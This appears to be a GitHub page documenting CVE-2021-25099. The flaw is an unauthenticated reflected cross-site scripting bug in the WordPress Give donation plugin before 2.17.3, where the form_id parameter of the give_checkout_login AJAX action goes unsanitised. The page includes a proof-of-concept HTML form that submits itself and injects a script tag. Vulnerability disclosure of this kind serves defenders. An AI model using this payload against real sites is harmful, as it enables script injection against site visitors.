Skip to content

Latest commit

 

History

History

CVE-2021-25099

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 

Give < 2.17.3 - Unauthenticated Reflected Cross-Site Scripting

Description
The plugin does not sanitise and escape the form_id parameter before outputting it back in the response of an unauthenticated request via the give_checkout_login AJAX action, leading to a Reflected Cross-Site Scripting

Proof of Concept

As an unauthenticated user:

<html>

  <body>

    <form action="https://example.com/wp-admin/admin-ajax.php" id="hack" method="POST">

      <input type="hidden" name="action" value="give_checkout_login" />

      <input type="hidden" name="form_id" value='xxxxxx"><script>alert(/XSS/)</script>' />

      <input type="submit" value="Submit request" />

    </form>

  </body>



  <script>

    var form1 = document.getElementById('hack');

    form1.submit();

</script>

</html> 

References

https://wpscan.com/vulnerability/87a64b27-23a3-40f5-a3d8-0650975fee6f